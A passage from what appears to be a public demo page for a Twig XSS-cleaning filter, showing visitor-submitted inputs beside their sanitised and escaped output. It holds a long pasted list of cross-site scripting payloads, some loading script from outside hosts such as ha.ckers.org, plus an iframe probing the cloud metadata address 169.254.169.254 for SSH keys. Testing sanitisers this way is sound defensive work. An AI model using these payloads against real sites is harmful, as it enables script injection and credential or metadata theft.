implementation=\\\"#default#time2\\\"&gt;&lt;t:set attributeName=\\\"innerHTML\\\" to=\\\"XSSalert&#40;"XSS"&#41;\\\"&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n(\\\"&lt;SCRI\\\");PT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;form id=\\\"test\\\" /&gt;&lt;button form=\\\"test\\\" formaction=\\\"(123)\\\"&gt;TESTHTML5FORMACTION\\r\\n&lt;form&gt;&lt;button formaction=\\\"(123)\\\"&gt;crosssitespt\\r\\n&lt;frameset =alert&#40;123&#41;&gt;\\r\\n&lt;!--&lt;img src=\\\"--&gt;&lt;img src=x =alert&#40;123&#41;//\\\"&gt;\\r\\n&lt;style&gt;&lt;img src=\\\"&lt;/style&gt;&lt;img src=x =alert&#40;123&#41;//\\\"&gt;\\r\\n&lt;object data=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&gt;\\r\\n&lt;embed src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&gt;\\r\\n&lt;embed src=\\\"(1)\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n&lt;! foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n({0:#0=alert/#0#/#0#(123)})\\r\\nReferenceError.prototype.__defineGetter__(\\\'name\\\', function(){alert&#40;123&#41;}),x\\r\\nObject.__noSuchMethod__ = Function,[{}][0].constructor._(\\\'alert&#40;1&#41;\\\')()\\r\\n&lt;script src=\\\"#\\\"&gt;{alert&#40;1&#41;};1\\r\\ncrypto.generateCRMFRequest(\\\'CN=0\\\',0,0,null,\\\'alert&#40;1&#41;\\\',384,null,\\\'rsa-dual-use\\\')\\r\\n&lt;svg xmlns=\\\"#\\\"&gt;alert&#40;1&#41;&lt;/svg&gt;\\r\\n&lt;svg =\\\"(123)\\\" xmlns=\\\"#\\\"&gt;&lt;/svg&gt;\\r\\n&lt;iframe xmlns=\\\"#\\\" src=\\\"(1)\\\"&gt;&lt;/iframe&gt;\\r\\n\\r\\n\\r\\n"&gt;&lt;"\\r\\n">&lt;"\\r\\n\\r\\n&gt;&lt;s+cript&gt;alert&#40;&#41;\\r\\n&gt;alert&#40;&#41;\\r\\n&gt;&lt;alert&#40;&#41;;//&lt;\\r\\nfooalert&#40;&#41;\\r\\nalert&#40;&#41;\\r\\n"/&gt;&lt;BODY src=http://my.box.com/xss.js&gt;")&gt;\\r\\n; alert&#40;&#41;; var foo=\\r\\nfoo\\\\; alert&#40;&#41;;//;\\r\\n&lt;script &gt;alert&#40;&#41;\\r\\n&lt;img src=asdf =alert&#40;&#41;&gt;\\r\\n&lt;BODY =alert&#40;XSS&#41;&gt;\\r\\nalert&#40;1&#41;\\r\\n\\\"&gt;alert&#40;String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101&#41;)\\r\\n&lt;video src=1 =alert&#40;1&#41;&gt;\\r\\n&lt;audio src=1 =alert&#40;1&#41;&gt;</p> <p>by a | at 2021-08-19 09:36:45</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">test</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">test</code> <p>keyword(s): prueba</p> <p>description: test</p> <p>by jorge | at 2021-08-17 20:57:46</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(\\\&quot;hola\\\&quot;);&lt;/script&gt;</code> <p>keyword(s): prueba</p> <p>description: prueba</p> <p>by jorge | at 2021-08-17 20:56:57</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">sad</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">sad</code> <p>keyword(s): </p> <p>description: </p> <p>by 123 | at 2021-08-17 15:58:37</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">&lt;iframe width=\\\\\\\\\\\\\\\"700px\\\\\\\\\\\\\\\" src=\\\\\\\\\\\\\\\"http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key\\\\\\\\\\\\\\\"&gt;&lt;/iframe&gt;\\\\\\\\r\\\\\\\\n</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;iframe width=\\\\\\\\\\\\\\\&quot;700px\\\\\\\\\\\\\\\&quot; src=\\\\\\\\\\\\\\\&quot;http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key\\\\\\\\\\\\\\\&quot;&gt;&lt;/iframe&gt;\\\\\\\\r\\\\\\\\n</code> <p>keyword(s): sdf</p> <p>description: sdf</p> <p>by sdf | at 2021-08-17 10:48:55</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">&lt;iframe width=\\\"700px\\\" src=\\\"http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key\\\"&gt;&lt;/iframe&gt;\\r\\n</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;iframe width=\\\&quot;700px\\\&quot; src=\\\&quot;http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key\\\&quot;&gt;&lt;/iframe&gt;\\r\\n</code> <p>keyword(s): a</p> <p>description: a</p> <p>by a | at 2021-08-12 18:48:42</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(\\\\\\\\\\\\\\\&quot;hello\\\\\\\\\\\\\\\&quot;);&lt;/script&gt;</code> <p>keyword(s): 1</p> <p>description: 2</p> <p>by 2 | at 2021-08-12 18:17:48</p> </div> </div> </div> <!--/wrap--> <div class="footer"> <div class="container"> <p class="text-muted">BY <a target="_blank" href="http://moelleken.org/">LARS MOELLEKEN</a> WITH <span class="font-color-red">HATE</span> IN 2015</p> </div> </div> <ul class="nav pull-right scroll-top"> <li><a href="./index.html" title="Scroll to top"><i class="glyphicon glyphicon-chevron-up"></i></a></li> </ul> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script> <script>window.jQuery || document.write('<script src="vendor/bower/jquery/dist/jquery.min.js"><\/script>')</script> <script> // Avoid `console` errors in browsers that lack a console. (function() { var method; var noop = function () {}; var methods = [ 'assert', 'clear', 'count', 'debug', 'dir', 'dirxml', 'error', 'exception', 'group', 'groupCollapsed', 'groupEnd', 'info', 'log', 'markTimeline', 'profile', 'profileEnd', 'table', 'time', 'timeEnd', 'timeStamp', 'trace', 'warn' ]; var length = methods.length; var console = (window.console = window.console || {}); while (length--) { method = methods[length]; // Only stub undefined methods. if (!console[method]) { console[method] = noop; } } }()); </script> <script src="/vendor/modernizr.custom.js"></script> <!--[if lt IE 9]> <script src="/vendor/bower/nwmatcher/src/nwmatcher.js"></script> <script src="/vendor/bower/selectivizr/selectivizr.js"></script> <![endif]--> <script> Modernizr.load( { test : Modernizr.mq('only all'), nope : '/vendor/bower/respond/dest/respond.min.js' } , { test: Modernizr.cssremunit, nope : '/vendor/bower/rem-unit-polyfill/js/rem.min.js' } ); </script> <!-- load web-fonts --> <script> //noinspection JSUnusedGlobalSymbols,JSUndeclaredVariable,JSUndeclaredVariable WebFontConfig = { google: { families: ['Open Sans:300,400,800'] }, timeout: 2000 }; (function(d) { var wf = d.createElement('script'), s = d.scripts[0]; wf.src = 'https://ajax.googleapis.com/ajax/libs/webfont/1.5.18/webfont.js'; s.parentNode.insertBefore(wf, s); })(document); </script> <script src="/js-min/plugins.js"></script> <script src="/js-min/app.js"></script> </body> </html>